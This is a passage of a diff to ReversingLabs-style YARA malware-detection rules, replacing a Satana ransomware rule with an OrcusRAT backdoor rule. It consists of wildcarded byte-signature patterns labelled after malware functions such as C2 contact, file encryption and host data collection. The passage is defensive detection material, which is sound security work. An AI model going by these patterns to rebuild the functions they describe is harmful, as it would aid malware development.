?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8B - 4D ?? 6A ?? 68 ?? ?? ?? ?? E8 + $contact_c2_server = { + 55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? 48 8D 45 + ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 48 8D 15 ?? ?? + ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 50 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? + ?? ?? 48 8B 55 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 4C 8D 45 + ?? 48 8B 55 ?? 48 8D 8D ?? ?? ?? ?? 48 89 4C 24 ?? 48 8D 4D ?? 48 89 4C 24 ?? 4D 89 + C1 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? + 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 + 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 + E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74 ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? + ?? 48 8D 95 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 4D ?? 48 8D 55 ?? + 48 8B 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? BB + ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 89 D8 + EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 + C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? + 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 89 + C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 + E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3 + } + $parse_c2_response = { + 55 53 48 83 EC ?? 48 8D 6C 24 ?? 48 89 4D ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 + 8D 55 ?? 48 8D 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 + ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? + ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 + ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C1 48 8B 55 ?? 48 + 8B 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B + 55 ?? 48 01 C2 48 8B 45 ?? 49 89 D0 BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 + ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 + D8 48 89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 + 89 C1 E8 ?? ?? ?? ?? 90 48 83 C4 ?? 5B 5D C3 + } + $download_file_from_c2_p1 = { + 55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? 4C 89 45 + ?? 4C 89 4D ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 5D ?? 48 8B 55 ?? + 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? + ?? 49 89 D0 48 89 C2 48 89 D9 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 88 45 ?? 48 8D 85 ?? ?? + ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 0F B6 45 ?? 83 F0 ?? 84 C0 0F 84 ?? ?? ?? ?? 48 8D 85 + ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? + 48 89 C2 48 8D 85 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF + D0 89 45 ?? 83 7D ?? ?? 0F 95 C0 84 C0 74 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 + 8D 55 ?? 48 8B 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 + ?? 48 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 9D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? + 48 89 C1 E8 ?? ?? ?? ?? 48 89 C2 48 8B 45 ?? 49 89 D9 49 89 D0 BA ?? ?? ?? ?? 48 89 + C1 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 8D 45 ?? 48 + } + $download_file_from_c2_p2 = { + 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 + E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 8D 45 ?? 48 8B 55 ?? 49 + 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05 + ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 4D ?? 48 8D 55 ?? 49 89 C8 48 + 89 C1 E8 ?? ?? ?? ?? 90 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 + ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? + ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? + EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 + C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 + 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 8B + 45 ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3 + } + $reply_to_c2_server = { + 55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? 4C 89 45 + ?? 4C 89 4D ?? 48 8B 55 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? + 48 8B 55 ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8B 55 ?? 49 89 + D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05 ?? + ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 8D ?? ?? ?? ?? 48 8D 55 ?? 49 89 + C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 + ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 + ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? + 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB + ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 + E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 + 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 81 + C4 ?? ?? ?? ?? 5B 5D C3 } condition: - uint16(0)==0x5A4D and ($find_files) and ($import_key) and ($encrypt_files) + uint16(0)==0x5A4D and ($anti_sandbox_detect_environment) and ($collect_host_information) and ($contact_c2_server) and ($parse_c2_response) and ( all of ($download_file_from_c2_p*)) and ($reply_to_c2_server) } -rule REVERSINGLABS_Win32_Ransomware_Satana : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Orcusrat : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Satana ransomware." + description = "Yara rule that detects OrcusRAT backdoor." author = "ReversingLabs" - id = "8dc5bf7c-d4cb-5961-804b-035676dacbc0" - date = "2020-07-15" - modified = "2020-07-15" + id = "d4700cd1-73a4-552d-bc27-7408508a28e7" + date = "2024-09-10" + modified = "2024-09-10" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Satana.yara#L1-L123" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5deb6ac2e8b64fb6f7af8c41a9b9e695668ca66c96c65f0c7350b11cd4ae0c50" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/backdoor/ByteCode.MSIL.Backdoor.OrcusRAT.yara#L1-L134" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "17a85613e9e4c862ce81fee49065c250381dbf8a50cf07d496f5fd2c1b82d92e" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Satana" + tc_detection_type = "Backdoor" + tc_detection_name = "OrcusRAT" tc_detection_factor = 5 importance = 25 strings: - $encrypt_files_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? - ?? 83 EC ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 57 89 65 ?? C7 45 ?? ?? ?? ?? ?? 66 - 0F 57 C0 66 0F 13 45 ?? 68 ?? ?? ?? ?? 8B 75 ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 90 - 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F8 89 - 7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 8B 75 ?? 89 75 ?? - 8B 5D ?? 89 5D ?? 83 FE ?? 75 ?? 85 DB 0F 84 ?? ?? ?? ?? 8B CE 0B CB 0F 84 ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 53 56 E8 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 33 C9 - 03 C6 13 CB 83 E8 ?? 89 45 ?? 83 D9 ?? 89 4D ?? 6A ?? 8B 55 ?? 52 6A ?? 6A ?? 6A ?? - 57 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? - ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 89 4D ?? 6A ?? FF 15 ?? - ?? ?? ?? 83 C4 ?? 8B F0 66 0F 57 C0 66 0F 13 45 ?? 8B 5D ?? 8B 7D ?? 90 83 7D ?? ?? - 0F 8C ?? ?? ?? ?? 7F ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? 8B D3 83 C2 ?? 8B 75 ?? 8B CE - 83 D1 ?? 8B 45 ?? 3B C8 7F ?? 7C ?? 3B 55 ?? 77 ?? BF ?? ?? ?? ?? 33 C0 8B 75 ?? 03 - } - $encrypt_files_p2 = { - F3 8B DA 89 4D ?? EB ?? 8B 7D ?? 2B FB 1B C6 8B 55 ?? 8D 34 13 03 DF 11 45 ?? 89 5D - ?? 89 45 ?? 89 7D ?? 83 7D ?? ?? 7F ?? 7C ?? 83 7D ?? ?? 73 ?? 8B 4D ?? 89 4D ?? 83 - F9 ?? 7D ?? C6 04 31 ?? 41 EB ?? 29 7D ?? 19 45 ?? 33 C0 89 45 ?? 83 F8 ?? 7D ?? 8B - 0C 85 ?? ?? ?? ?? 31 0C 86 40 EB ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 - ?? 88 04 37 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 01 - 0D ?? ?? ?? ?? 8B 55 ?? 11 15 ?? ?? ?? ?? 8B 45 ?? 50 8B 0D ?? ?? ?? ?? 51 68 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 7D ?? EB ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 FF - 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? FF 15 ?? ?? ?? ?? 50 - 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B - 4D ?? 8D 95 ?? ?? ?? ?? 0F B7 01 66 89 02 83 C1 ?? 83 C2 ?? 66 85 C0 75 ?? 6A ?? 8D - 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C4 ?? 83 C0 ?? 74 ?? 8B D0 8D B5 ?? ?? ?? ?? - 0F B7 0A 66 89 0E 83 C2 ?? 83 C6 ?? 66 85 C9 75 ?? 33 C9 66 89 08 8D 95 ?? ?? ?? ?? - 52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? - ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF - 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? - ?? ?? EB ?? B8 ?? ?? ?? ?? C3 8B 65 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 - } - $search_files_p1 = { - E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 33 D2 56 50 66 89 94 24 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 56 52 - 66 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 56 50 89 - 74 24 ?? E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 52 68 - ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? - ?? ?? 8D 94 24 ?? ?? ?? ?? 8B C7 2B D7 8D 9B ?? ?? ?? ?? 0F B7 08 66 89 0C 02 83 C0 - ?? 66 3B CE 75 ?? 8D 84 24 ?? ?? ?? ?? 83 C0 ?? 8D A4 24 ?? ?? ?? ?? 66 8B 48 ?? 83 - C0 ?? 66 3B CE 75 ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 08 66 8B 0D ?? ?? ?? ?? - 89 50 ?? 68 ?? ?? ?? ?? 66 89 48 ?? FF 15 ?? ?? ?? ?? 8D 54 24 ?? 52 8D 84 24 ?? ?? - ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 75 ?? 68 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5 - 5D C2 ?? ?? 8D A4 24 ?? ?? ?? ?? 8B 7D ?? 8B 35 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 68 ?? - ?? ?? ?? 51 FF D6 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 54 24 ?? 68 ?? ?? ?? ?? - 52 FF D6 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? F6 44 24 ?? ?? 0F 85 ?? ?? ?? ?? 8D 44 24 - ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 0F 84 ?? ?? ?? ?? 66 83 3D ?? ?? - ?? ?? ?? BF ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B C7 8D 50 ?? EB ?? 8D 9B ?? ?? ?? ?? 66 - 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 8B CB D1 F8 8D 71 ?? 66 8B 11 83 C1 ?? 66 85 D2 - } - $search_files_p2 = { - 75 ?? 2B CE D1 F9 3B C1 75 ?? 53 57 FF 15 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 66 8B 0F - 83 C7 ?? 66 85 C9 75 ?? 66 39 0F 75 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? 64 8B 15 ?? ?? ?? ?? 8B 32 8B 55 ?? 83 C4 ?? 8D 4C 24 ?? 51 52 68 ?? ?? ?? ?? 50 - 89 46 ?? FF 15 ?? ?? ?? ?? 8B 46 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 85 - C0 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 F8 ?? 7D ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - 8B 4E ?? 6A ?? 6A ?? 51 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 15 ?? ?? ?? - ?? 89 04 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 6A ?? 51 FF 15 ?? ?? ?? - ?? E9 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF - D3 8B F8 6A ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? - ?? ?? 8B 56 ?? 6A ?? 6A ?? 52 68 ?? ?? ?? ?? 6A ?? 6A ?? FF D3 8B 0D ?? ?? ?? ?? 89 - 04 8D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 04 95 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? - E9 ?? ?? ?? ?? 8D 4C 24 ?? 51 57 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 FF 15 ?? ?? - ?? ?? A1 ?? ?? ?? ?? 48 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 FF D6 83 C4 ?? 85 - C0 0F 84 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C4 - ?? 85 C0 75 ?? 8D 9B ?? ?? ?? ?? 0F B7 8C 04 ?? ?? ?? ?? 66 89 8C 04 ?? ?? ?? ?? 83 - C0 ?? 66 85 C9 75 ?? 8D BC 24 ?? ?? ?? ?? 83 C7 ?? 66 8B 47 ?? 83 C7 ?? 66 85 C0 75 - ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 68 ?? ?? ?? ?? F3 A5 - FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 54 24 ?? 52 - 50 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 74 24 ?? 56 FF 15 - } - $remote_connection = { - 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 57 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8B 45 ?? 8B 0D ?? ?? ?? ?? 0F B6 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 3D ?? - ?? ?? ?? 8D 70 ?? 8B 00 56 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 52 0F B7 15 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 51 52 50 - 6A ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 FF D7 83 C4 ?? 80 3E ?? 74 ?? B9 ?? ?? ?? - ?? 8B C6 EB ?? 8D 49 ?? C6 00 ?? 40 49 75 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? 8D 50 ?? 8D 49 ?? 8A 08 40 84 C9 75 ?? 8D 8D ?? ?? ?? ?? 51 2B C2 - 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 FF D7 8D 85 ?? - ?? ?? ?? 83 C4 ?? 8D 50 ?? 8A 08 40 84 C9 75 ?? 6A ?? 2B C2 50 8D 85 ?? ?? ?? ?? 50 - 53 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 9B ?? ?? ?? ?? C6 00 ?? 40 - 49 75 ?? 53 FF 15 ?? ?? ?? ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C2 - } - - condition: - uint16(0)==0x5A4D and ($remote_connection and ( all of ($search_files_p*)) and ( all of ($encrypt_files_p*))) + $get_tcp_connections = { + 18 0B 16 0C 7E ?? ?? ?? ?? 12 ?? 17 07 1B 16 28 ?? ?? ?? ?? 0D 09 2C ?? 09 1F ?? 2E + ?? 72 ?? ?? ?? ?? 09 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 08 28 ?? ?? ?? + ?? 13 ?? 11 ?? 12 ?? 17 07 1B 16 28 ?? ?? ?? ?? 0D 09 2C ?? 72 ?? ?? ?? ?? 09 8C ?? + ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? + ?? ?? ?? A5 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 8C ?? ?? ?? + ?? 28 ?? ?? ?? ?? 6A 58 28 ?? ?? ?? ?? 13 ?? 11 ?? 7B ?? ?? ?? ?? 8D ?? ?? ?? ?? 0A + 16 13 ?? 2B ?? 11 ?? D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? A5 ?? ?? ?? ?? 13 + ?? 06 11 ?? 11 ?? A4 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 8C ?? ?? ?? ?? 28 ?? ?? + ?? ?? 6A 58 28 ?? ?? ?? ?? 13 ?? 11 ?? 17 58 13 ?? 11 ?? 6A 11 ?? 7B ?? ?? ?? ?? 6E + 32 ?? DE ?? 11 ?? 28 ?? ?? ?? ?? DC 06 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? (FE | 06) + ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 + } + $get_operating_system_information_p1 = { + 73 ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F + ?? ?? ?? ?? 0B 12 ?? (FE | 16) ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? + ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? + ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F ?? ?? ?? + ?? 0A 28 ?? ?? ?? ?? 0C 08 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 2B ?? + 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 06 72 + ?? ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 0D + 09 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 09 (FE | 06) ?? + ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 72 ?? ?? + ?? ?? 6F ?? ?? ?? ?? 39 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? + 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 2F ?? 06 1C 8D ?? ?? ?? ?? + 25 16 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 + 18 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A + 11 ?? 8C ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 38 ?? + ?? ?? ?? 06 1C 8D ?? ?? ?? ?? 25 16 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F + } + $get_operating_system_information_p2 = { + A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? 8C ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 25 + 1A 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 28 ?? + ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 06 1A 8D ?? ?? ?? ?? 25 16 09 7B ?? ?? ?? ?? 72 ?? ?? + ?? ?? 6F ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 09 7B ?? ?? ?? ?? 72 ?? ?? ?? + ?? 6F ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 + 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 06 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 